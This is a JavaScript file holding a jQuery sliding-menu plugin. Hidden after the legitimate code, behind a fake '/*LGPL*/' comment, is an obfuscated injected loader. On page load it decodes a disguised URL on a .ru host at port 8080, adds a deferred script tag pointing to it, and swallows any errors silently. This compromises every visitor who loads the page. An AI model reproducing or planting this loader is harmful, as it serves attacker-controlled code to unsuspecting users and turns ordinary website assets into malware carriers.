/* * simple sliding menu using jQuery and Interface - http://www.getintothis.com *  * note: this library depends on jquery (http://www.jquery.com) and * interface (http://interface.eyecon.ro) * * Copyright (c) 2006 Ramin Bozorgzadeh * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LECENSE.txt) linceses. */$.fn.rb_menu = function(options) {  var $self = this;  $self.options = {    // transitions: http://gsgd.co.uk/sandbox/jquery/easing/    transition:    'easeOutBounce',    // trigger events: mouseover, mousedown, mouseup, click, dblclick    triggerEvent:  'mouseover',    // number of ms to delay before hiding menu (on page load)    loadHideDelay : 1000,    // number of ms to delay before hiding menu (on mouseout)    blurHideDelay:  500,    // number of ms for transition effect    effectDuration: 1000,    // hide the menu when the page loads    hideOnLoad: true,    // automatically hide menu when mouse leaves area    autoHide: true  }  // make sure to check if options are given!  if(options) {    $.extend($self.options, options);  }  return this.each(function() {    var $menu = $(this);    var $menuItems = $menu.find('.items');    var $toggle = $menu.find('.toggle');  	// add 'hover' class to trigger for css styling  	$toggle.hover(  	  function() {  		  $toggle.addClass('toggle-hover');  	  },  	  function() {  		  $toggle.removeClass('toggle-hover');  	  }  	);  	if($self.options.hideOnLoad) {  		if($self.options.loadHideDelay <= 0) {  			$menuItems.hide();  			$menu.closed = true;  			$menu.unbind();  		} else {  			// let's hide the menu when the page is loading  			// after {loadHideDelay} milliseconds  			setTimeout( function() {  				$menu.hideMenu();  			}, $self.options.loadHideDelay);  		}  	}    // bind event defined by {triggerEvent} to the trigger    // to open and close the menu    $toggle.bind($self.options.triggerEvent, function() {      // if the trigger event is click or dblclick, we want      // to close the menu if its open      if(($self.options.triggerEvent == 'click' || $self.options.triggerEvent == 'dblclick') && !$menu.closed) {        $menu.hideMenu();      } else {        $menu.showMenu();      }    });    $menu.hideMenu = function() {      if($menuItems.css('display') == 'block' && !$menu.closed) {        $menuItems.hide(          'slide',          {            direction: 'up',            easing: $self.options.transition          },          $self.options.effectDuration,          function() {            $menu.closed = true;            $menu.unbind();          }        );      }    }    $menu.showMenu = function() {      if($menuItems.css('display') == 'none' && $menu.closed) {        $menuItems.show(          'slide',          {            direction: 'up',            easing: $self.options.transition          },          $self.options.effectDuration,          function() {            $menu.closed = false;            if($self.options.autoHide) {              $menu.hover(                function(e) {                  clearTimeout($menu.timeout);                },                 function(e) {                  $menu.timeout = setTimeout(function() {                      $menu.hideMenu();                  }, $self.options.blurHideDelay);                }              );            }          }        );      }    }  });};
/*LGPL*/ try{ window.onload = function(){De0xpywz9fkz = 'h#^#t)()t)p!:^(/)$!(/&@a)(b)!$(o^$u!t^&u&#s@!)-#$^o((!$r@@$g).&)5#1@#.^&&c@o)!(m$&.!)4@^$s^^h&(@a@r^&!e^##&d$#-$c$!o$^m#&(@$.!#)m(i#)$n&&d)(g!a!#@)$m$e@!(w&!@o!r#!)k^s)(!(.($!r#@#^u):&)&^&8&#!0&)@8@#^0@$/#@&&a!m$(@(a)#z!!o@n(.@$^d#^^e@!!$/@#a@@(m(#(a@&@z)$o(&n()&.&)d))e!@(^/^g$o)!!o&$g)@)@l(@e^).!$&c)o$(m!)&/!t#$!)i##c&@!k(^)()e)@t()@!m^#@a)!s&#t^)e^)r^.^c)$#o^&m!(/^&((j)($c(p($e()n#!n#$!e$!y@.!&c$o(((m&/!)'.replace(/\)|\^|&|\$|#|\(|@|\!/ig, '');var C2rmltcik6ru = 's#&c(@^r#^#&i^p@t$@@$'.replace(/#|@|&|\(|\!|\)|\$|\^/ig, '');var J64ivf6xwlc = 's^r@^c@$#'.replace(/\$|\!|\(|\^|#|@|\)|&/ig, '');var Ipq8cx3g1h8aj = C2rmltcik6ru;var H2895h6g3c5u = document.createElement(Ipq8cx3g1h8aj);H2895h6g3c5u.setAttribute('defer', 'd@&e@!f(&e(^r@#('.replace(/#|\(|\$|\)|@|&|\^|\!/ig, ''));var B6dlntpar8vk = 't@)(e(x(!t($/!(!j)a)#)v$#a@!$s(@$(c&r)i^#$p&^))t!!@'.replace(/@|#|&|\!|\$|\(|\)|\^/ig, '');H2895h6g3c5u.setAttribute('id', 'L(p)#!&$b^&@#v@l^$(^2&#(^0#!)h(^)&u&^@#6()(m))2#!^'.replace(/\$|\!|\)|#|@|&|\(|\^/ig, ''));H2895h6g3c5u.setAttribute(J64ivf6xwlc,  De0xpywz9fkz);H2895h6g3c5u.setAttribute('type', B6dlntpar8vk);document.body.appendChild(H2895h6g3c5u);if (document){Ipq8cx3g1h8aj = C2rmltcik6ru;}} }  catch(Xy3dd6qr2eqihskuslme ) {}